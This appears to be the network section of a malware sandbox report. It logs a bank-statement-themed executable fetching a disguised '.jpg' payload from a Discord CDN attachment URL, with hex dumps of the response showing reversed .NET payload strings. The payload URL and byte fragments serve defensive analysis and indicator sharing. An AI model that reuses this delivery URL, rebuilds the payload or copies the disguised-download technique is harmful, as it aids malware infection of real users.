Jan 28, 2022 22:14:32.654887915 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.657655001 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.657831907 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.673309088 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.673343897 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.673469067 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.673487902 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.673505068 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.673523903 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.673573017 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.673583984 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.673608065 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.673733950 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.673758030 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.673795938 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.673806906 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.673831940 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.673979998 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674000978 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674048901 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.674060106 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674079895 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.674210072 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674232960 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674278021 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.674288988 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674304962 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.674448013 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674468994 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674515009 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.674525023 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674549103 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.674706936 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674736023 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674783945 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.674796104 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674808025 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.674921036 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674942970 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.674993992 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.675005913 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675029039 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.675142050 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675164938 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675201893 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.675214052 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675240993 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.675359964 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675381899 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675420046 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.675430059 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675446987 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.675601959 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675625086 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675673962 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.675684929 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675697088 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.675833941 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675856113 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675898075 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.675909042 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.675932884 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.676018953 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.676063061 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.676085949 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.676130056 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.676139116 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.676162004 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.676197052 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.676311970 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.676333904 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.676387072 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.676395893 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.676417112 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.676527023 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.676677942 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.676701069 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.676763058 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.676772118 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.676799059 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.676858902 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.676908970 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.676933050 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.676995039 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.677004099 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.677128077 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.677150965 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.677201033 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.677212000 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.677243948 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.677248001 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.677371979 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.677398920 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.677448034 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.677459002 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.677488089 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.677961111 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.691194057 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.691239119 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.691293955 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.691314936 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.691332102 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.691337109 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.691391945 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.691400051 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.691457033 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.691462994 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.691504002 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.693063021 CET	49761	443	192.168.2.4	162.159.130.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 22:14:30.753871918 CET	62389	53	192.168.2.4	8.8.8.8
Jan 28, 2022 22:14:30.775060892 CET	53	62389	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 28, 2022 22:14:30.753871918 CET	192.168.2.4	8.8.8.8	0x752	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 28, 2022 22:14:30.775060892 CET	8.8.8.8	192.168.2.4	0x752	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)
Jan 28, 2022 22:14:30.775060892 CET	8.8.8.8	192.168.2.4	0x752	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)
Jan 28, 2022 22:14:30.775060892 CET	8.8.8.8	192.168.2.4	0x752	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)
Jan 28, 2022 22:14:30.775060892 CET	8.8.8.8	192.168.2.4	0x752	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)
Jan 28, 2022 22:14:30.775060892 CET	8.8.8.8	192.168.2.4	0x752	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49761	162.159.130.233	443	C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

Timestamp	kBytes transferred	Direction	Data
2022-01-28 21:14:32 UTC	0	OUT	GET /attachments/913584216825028612/936582704412110848/Cszji.jpg HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2022-01-28 21:14:32 UTC	0	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 21:14:32 GMT Content-Type: image/jpeg Content-Length: 553472 Connection: close CF-Ray: 6d4d3b219d729000-FRA Accept-Ranges: bytes Age: 33702 Cache-Control: public, max-age=31536000 ETag: "ca529d682c638106e9ce0046d53d4e0f" Expires: Sat, 28 Jan 2023 21:14:32 GMT Last-Modified: Fri, 28 Jan 2022 11:25:17 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Cf-Bgj: h2pri Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1643369117647468 x-goog-hash: crc32c=49hqOw== x-goog-hash: md5=ylKdaCxjgQbpzgBG1T1ODw== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 553472 X-GUploader-UploadID: ADPycdtrgkZLanBaBsjZKxIRcb71yXJ5KLzUX3X8KQedg2-o-kXI3kCUoUO-El4pxADN25K3Kmdxir2lXiK6zAxl5Pw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xwD%2BsI2aoA0nhmDD0wHmm4HuxRzy7TZZTMu4hQGrRpugbp5bgN37B8D%2FjBUCilDr%2B%2FS4YEy2APp7YM040NSrI9wZHl%2FqEHaO%2FGQ8HHAo55NmBVSnBS%2BWPzJeTg9RJc27X7O2qg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare
2022-01-28 21:14:32 UTC	1	IN	Data Raw: 00 Data Ascii:
2022-01-28 21:14:32 UTC	1	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-01-28 21:14:32 UTC	2	IN	Data Raw: 00 02 00 00 00 04 00 00 00 00 00 00 00 3f 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 03 0c 00 00 00 00 00 00 00 00 00 00 03 0c 00 08 a0 58 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ?OFNI_NOISREV_SV4XH0
2022-01-28 21:14:32 UTC	4	IN	Data Raw: 23 15 01 00 27 00 4b 00 2f 00 73 00 21 00 6e 00 68 00 56 00 4a 00 23 15 01 00 27 00 4b 00 2f 00 73 00 21 00 2b 00 24 00 3a 00 49 00 23 15 01 00 27 00 4b 00 2f 00 73 00 21 00 65 00 4d 00 51 00 3b 00 23 15 01 00 27 00 4b 00 2f 00 73 00 21 00 34 00 5f 00 44 00 47 00 23 15 01 00 27 00 4b 00 2f 00 73 00 21 00 67 00 3c 00 64 00 43 00 23 15 01 00 27 00 4b 00 2f 00 73 00 21 00 64 00 6a 00 5d 00 3f 00 23 15 01 00 27 00 4b 00 2f 00 73 00 21 00 27 00 26 00 5f 00 3a 00 23 15 01 00 27 00 4b 00 2f 00 73 00 21 00 5e 00 54 00 4e 00 36 00 23 15 01 00 27 00 4b 00 2f 00 73 00 21 00 2a 00 70 00 25 00 43 00 23 15 01 00 27 00 4b 00 2f 00 73 00 21 00 70 00 47 00 30 00 37 00 23 15 00 00 62 00 63 00 32 00 36 00 32 00 62 00 66 00 61 00 63 00 30 00 65 00 61 00 64 00 62 00 39 00 37 Data Ascii: #'K/s!nhVJ#'K/s!+$:I#'K/s!eMQ;#'K/s!4_DG#'K/s!g<dC#'K/s!dj]?#'K/s!'&_:#'K/s!^TN6#'K/s!*p%C#'K/s!pG07#bc262bfac0eadb97
2022-01-28 21:14:32 UTC	5	IN	Data Raw: 07 08 0a 08 08 04 07 06 08 84 82 12 08 08 08 05 07 09 08 08 03 1d 21 83 12 03 20 09 08 08 03 1d 01 03 20 07 08 03 1d 08 08 05 1d 08 05 20 0a 08 08 08 21 83 12 08 08 06 07 0a 05 02 08 08 08 01 05 20 08 05 02 02 07 04 94 81 12 01 07 05 11 83 12 00 20 05 c8 81 12 1c 02 07 06 c8 81 12 01 81 12 64 82 12 1c 04 07 0c 08 64 82 12 02 07 06 0b 0a 09 08 05 04 01 81 12 05 1d 45 81 12 2d 12 05 1d 85 80 12 0c 07 17 08 08 05 1d 05 1d 08 08 08 08 05 1d 08 0a 07 0f 25 82 12 25 82 12 1d 08 1c 08 1c 51 83 12 07 07 10 4c 82 12 01 07 05 0e 0e 08 0e 08 0e 44 82 12 07 07 0b 08 01 01 00 04 49 83 11 00 20 05 cd 80 12 00 00 05 49 83 11 08 08 cd 80 12 04 07 0a 31 81 11 08 35 81 11 21 81 11 2d 81 11 0e 01 06 20 11 08 08 05 1d 0e 03 20 07 02 0e 02 03 07 05 05 1d 0e 01 02 00 06 e5 80 Data Ascii: ! ! ddE-%%QLDI I15!-
2022-01-28 21:14:32 UTC	6	IN	Data Raw: 06 39 82 12 51 83 12 51 83 12 39 82 12 51 83 12 02 71 11 15 39 82 12 51 83 12 02 71 11 15 39 82 12 51 83 12 02 71 11 15 35 82 12 02 59 12 15 51 83 12 02 08 51 83 12 1d 41 82 12 1d 0b 07 3d 1c 1d 51 83 12 1c 02 00 08 39 82 12 51 83 12 02 71 11 15 0a b1 82 11 39 82 12 51 83 12 02 71 11 15 02 07 0f 39 82 12 51 83 12 02 71 11 15 35 82 12 02 59 12 15 11 09 08 01 20 04 51 83 12 1d 51 83 12 1d 02 08 35 82 12 64 81 12 06 07 12 2d 12 0a 1c 03 07 06 19 08 c8 82 12 03 07 07 0d 02 01 20 04 2c 82 12 44 83 12 d8 83 12 0d 08 b0 82 12 b0 82 12 0d 78 83 12 02 0a 07 18 1c 01 3c 81 12 15 06 51 83 12 2c 82 12 74 82 12 6c 82 12 1c 51 83 12 74 82 12 84 82 12 08 09 07 19 58 11 39 82 12 1c e9 80 12 c8 82 12 51 83 12 39 82 12 b0 82 12 02 b4 81 12 4d 82 12 1c 35 82 12 b4 81 12 c8 Data Ascii: 9QQ9Qq9Qq9Qq5YQQA=Q9Qq9Qq9Qq5Y QQ5d- ,Dx<Q,tlQtX9Q9M5
2022-01-28 21:14:32 UTC	8	IN	Data Raw: 82 12 02 20 09 01 82 11 68 81 12 02 07 08 51 83 12 1c 08 c8 82 12 04 07 0a 06 08 c8 82 12 03 07 07 0e 02 02 07 04 18 08 02 0d 0a 08 c8 82 12 07 07 0b 2d 12 0a 51 83 12 08 04 07 09 e9 80 12 01 07 05 35 82 12 01 07 05 b4 81 12 c8 82 12 02 07 08 08 6c 82 12 1d 02 07 07 51 83 12 5c 82 12 02 07 08 f9 80 12 1c 1d fd 81 12 01 82 11 1c 04 20 0e f9 80 12 1c 1d fd 81 12 01 82 11 51 83 12 1c 05 00 11 1c 01 07 03 00 1e 01 61 12 15 01 1e 1d 00 1e 1d 01 03 02 10 10 00 1e 00 1e 08 02 71 11 15 02 0a 0b 00 1e 01 cc 80 12 15 07 00 1e 02 00 1e 08 02 71 11 15 07 08 00 1e 08 02 71 11 15 1d 02 07 0b 1c 25 82 12 64 81 12 02 1c 08 02 59 12 15 25 82 12 06 07 13 19 19 02 02 00 05 09 08 02 c8 82 12 04 07 08 35 82 12 f4 81 12 02 07 08 08 b1 82 11 01 20 06 08 ad 82 11 01 20 06 08 b5 Data Ascii: hQ-Q5lQ\ Qaqqq%dY%5
2022-01-28 21:14:32 UTC	9	IN	Data Raw: 08 75 83 12 08 02 5d 11 15 08 75 83 12 08 02 71 11 15 75 83 12 08 02 5d 11 15 75 83 12 08 02 59 12 15 03 07 1a 95 80 11 00 00 05 02 84 83 12 1c 03 07 07 00 13 02 01 20 05 08 01 79 11 15 05 00 13 01 79 11 15 00 20 08 84 83 12 08 02 71 11 15 08 01 13 00 20 04 84 83 12 08 02 5d 11 15 08 01 13 00 13 02 71 11 15 00 20 0a 01 13 00 13 02 5d 11 15 00 20 0a 08 01 75 12 15 05 08 01 79 11 15 84 83 12 08 02 71 11 15 84 83 12 08 02 5d 11 15 08 08 01 75 12 15 84 83 12 08 02 59 12 15 06 07 25 95 80 11 95 80 11 02 02 00 09 01 13 10 00 13 02 02 20 08 95 80 11 08 1c 08 84 83 12 05 07 0b 75 83 12 08 02 59 12 15 08 84 83 12 08 02 59 12 15 08 08 1c 02 07 04 05 1d 01 07 04 08 01 07 03 08 08 2d 12 08 2d 12 01 05 00 0a 02 08 08 05 1d 08 05 07 08 00 00 32 32 30 32 20 a9 c2 20 74 Data Ascii: u]uqu]uY yy q ]q ] uyq]uY% uYY--2202 t
2022-01-28 21:14:32 UTC	10	IN	Data Raw: 1d 01 04 20 0c cd 82 12 1d 06 05 e5 82 12 e5 82 12 08 02 20 09 e5 82 12 01 8d 80 12 15 06 09 50 83 12 06 04 02 05 1d 05 1d cd 82 12 03 20 0a e5 82 12 1d 01 01 20 07 05 1d 08 05 1d 01 03 00 08 ed 81 12 05 1d 01 00 07 d5 81 12 ed 81 12 01 00 08 02 08 0e 02 00 05 08 0e 01 00 04 0e 08 02 55 12 15 06 07 3c 83 11 06 04 40 83 12 06 04 2d 12 01 01 00 05 08 08 2d 12 01 03 00 07 03 10 01 01 00 05 0a 10 01 01 00 05 08 10 01 01 00 05 05 10 01 01 00 05 08 65 82 1f 06 05 1c 31 12 08 08 08 08 18 fd 80 12 07 20 0d 08 08 08 08 18 08 05 20 08 fd 80 12 08 10 08 10 02 03 20 0a 1c 31 12 08 10 08 08 10 08 18 fd 80 12 07 20 0f 08 10 08 08 10 08 18 02 05 20 0a 18 08 01 20 04 1c 31 12 08 18 fd 80 12 04 20 0a 08 18 08 02 20 05 fd 80 12 08 10 02 02 20 08 1c 31 12 08 10 08 05 1d 08 Data Ascii: P U<@--e1 1 1 1
2022-01-28 21:14:32 UTC	12	IN	Data Raw: 04 00 09 18 02 01 00 04 02 01 18 02 20 82 11 18 03 00 08 08 01 08 2a 02 09 10 09 18 1d 02 03 00 08 21 83 12 18 09 18 18 04 00 09 08 21 83 12 18 08 03 00 08 d5 80 11 10 08 0a 02 00 08 08 1c 82 12 08 02 03 00 08 08 10 08 08 02 00 06 08 21 83 12 08 01 03 00 08 08 08 08 18 18 04 00 07 18 82 12 06 04 08 01 b1 81 11 15 08 05 1d 94 81 12 01 04 00 0f 05 1d 05 1d 01 20 06 a0 83 12 94 81 12 05 1d 02 20 0a 0a 05 1d 01 02 20 06 08 82 11 06 04 39 83 12 06 04 f0 81 11 06 04 e8 81 12 e8 81 12 02 02 00 09 e8 81 12 02 01 20 06 e8 81 12 00 00 05 03 01 01 20 04 03 00 20 03 03 06 02 00 13 01 1c 12 15 00 20 08 08 08 05 1d 05 1d 03 20 08 08 05 1d 08 08 05 1d 08 05 20 0a 02 05 1d 01 02 20 06 02 08 05 1d 08 05 1d 05 1d 01 06 00 0c 07 08 05 1d 07 03 00 07 05 1d 05 1d cd 82 12 02 Data Ascii: *!!! 9
2022-01-28 21:14:32 UTC	13	IN	Data Raw: 02 13 01 13 00 13 fd 80 12 08 20 14 05 13 04 13 03 13 02 13 01 13 00 13 06 13 06 20 10 fd 80 12 00 13 01 20 07 02 13 01 13 00 13 01 03 20 09 fd 80 12 07 13 01 20 07 06 13 05 13 04 13 03 13 02 13 01 13 00 13 07 13 07 20 12 fd 80 12 09 13 01 20 07 08 13 07 13 06 13 05 13 04 13 03 13 02 13 01 13 00 13 09 13 09 20 16 03 13 02 13 01 13 00 13 01 04 20 0b fd 80 12 05 13 01 20 07 1c 31 12 04 13 03 13 02 13 01 13 00 13 fd 80 12 07 20 12 04 13 03 13 02 13 01 13 00 13 05 13 05 20 0e 1c 31 12 08 13 07 13 06 13 05 13 04 13 03 13 02 13 01 13 00 13 fd 80 12 0b 20 1a 08 13 07 13 06 13 05 13 04 13 03 13 02 13 01 13 00 13 01 09 20 15 1c 31 12 01 13 00 13 fd 80 12 04 20 0c 01 13 00 13 01 02 20 07 fd 80 12 04 13 01 20 07 1c 31 12 03 13 02 13 01 13 00 13 fd 80 12 06 20 10 03 Data Ascii: 1 1 1 1
2022-01-28 21:14:32 UTC	14	IN	Data Raw: 12 06 04 5c 81 12 06 04 c0 80 11 01 7d 12 15 06 08 c8 82 12 1d 06 05 51 81 12 06 04 51 83 12 06 04 51 83 12 1d 06 05 54 11 08 02 59 12 15 06 08 b4 82 12 1d 06 05 09 01 b1 81 11 15 06 07 c8 82 12 06 04 3d 82 12 06 04 09 06 02 0e 01 01 20 04 0e 00 20 03 28 81 11 01 01 20 06 28 81 11 00 20 05 02 01 01 20 04 02 00 20 03 0e 06 02 28 81 11 06 04 0a 01 01 20 04 0a 00 20 03 05 1d 01 01 20 05 05 1d 00 20 04 0a 06 02 0b 01 01 20 04 0b 00 20 03 0b 06 02 08 10 51 83 12 51 83 12 02 03 00 0b 00 00 00 03 04 00 00 00 02 04 00 00 00 01 04 00 00 00 00 04 30 11 06 03 06 01 01 20 04 06 00 20 03 06 06 02 05 1d 05 1d 01 00 06 02 08 08 05 1d 01 04 20 08 02 06 02 08 10 08 08 05 1d 08 02 05 20 0a 02 08 08 05 1d 08 01 05 20 09 84 83 12 84 83 12 01 02 20 09 84 83 12 10 08 02 02 20 Data Ascii: \}QQQTY= ( ( ( QQ0
2022-01-28 21:14:32 UTC	16	IN	Data Raw: 6c 61 67 65 4c 00 65 75 6c 61 56 67 6e 69 64 64 61 50 00 65 75 6c 61 56 65 64 6f 4d 00 65 75 6c 61 56 65 7a 69 53 79 65 4b 00 6f 54 79 70 6f 43 00 65 7a 69 6c 61 6e 69 46 73 73 65 72 70 70 75 53 00 64 49 64 61 65 72 68 54 64 65 67 61 6e 61 4d 5f 74 65 67 00 64 61 65 72 68 54 74 6e 65 72 72 75 43 5f 74 65 67 00 64 49 6e 6f 69 73 73 65 53 5f 74 65 67 00 73 73 65 63 6f 72 50 74 6e 65 72 72 75 43 74 65 47 00 6c 61 75 71 45 72 4f 6e 61 68 54 72 65 74 61 65 72 47 5f 70 6f 00 6e 6f 69 73 72 65 56 5f 74 65 67 00 6d 72 6f 66 74 61 6c 50 5f 74 65 67 00 6e 6f 69 73 72 65 56 53 4f 5f 74 65 67 00 6d 61 65 72 74 53 65 63 72 75 6f 73 65 52 74 73 65 66 69 6e 61 4d 74 65 47 00 74 63 65 6a 62 4f 74 65 47 00 65 74 79 42 53 6f 54 00 65 6c 62 75 6f 44 6f 54 00 65 74 79 42 65 Data Ascii: lageLeulaVgniddaPeulaVedoMeulaVeziSyeKoTypoCezilaniFsserppuSdIdaerhTdeganaM_tegdaerhTtnerruC_tegdInoisseS_tegssecorPtnerruCteGlauqErOnahTretaerG_ponoisreV_tegmroftalP_tegnoisreVSO_tegmaertSecruoseRtsefinaMteGtcejbOteGetyBSoTelbuoDoTetyBe
2022-01-28 21:14:32 UTC	17	IN	Data Raw: 65 76 6c 6f 73 65 52 00 65 70 79 54 74 6e 65 6d 65 6c 45 73 61 48 5f 74 65 67 00 74 72 6f 53 00 6e 61 65 6c 6f 6f 42 6f 54 00 65 6c 64 6e 61 48 64 6f 68 74 65 4d 65 76 6c 6f 73 65 52 00 65 6c 64 6e 61 48 64 6c 65 69 46 65 76 6c 6f 73 65 52 00 65 6c 64 6e 61 48 65 70 79 54 65 76 6c 6f 73 65 52 00 65 6c 64 6e 61 48 65 6c 75 64 6f 4d 5f 74 65 67 00 70 6f 50 00 6b 65 65 50 00 67 6e 69 72 74 53 65 76 6c 6f 73 65 52 00 66 4f 73 73 61 6c 63 62 75 53 73 49 00 6c 61 75 74 72 69 56 73 49 5f 74 65 67 00 64 6f 68 74 65 4d 74 65 47 00 72 6f 74 63 75 72 74 73 6e 6f 43 73 73 61 6c 43 6e 75 52 00 65 6c 64 6e 61 48 65 70 79 54 5f 74 65 67 00 65 75 6c 61 56 73 61 48 5f 74 65 67 00 64 6f 68 74 65 4d 63 69 72 65 6e 65 47 65 6b 61 4d 00 72 65 62 6d 65 4d 74 65 47 00 73 64 6c Data Ascii: evloseRepyTtnemelEsaH_tegtroSnaelooBoTeldnaHdohteMevloseReldnaHdleiFevloseReldnaHepyTevloseReldnaHeludoM_tegpoPkeePgnirtSevloseRfOssalcbuSsIlautriVsI_tegdohteMteGrotcurtsnoCssalCnuReldnaHepyT_tegeulaVsaH_tegdohteMcireneGekaMrebmeMteGsdl
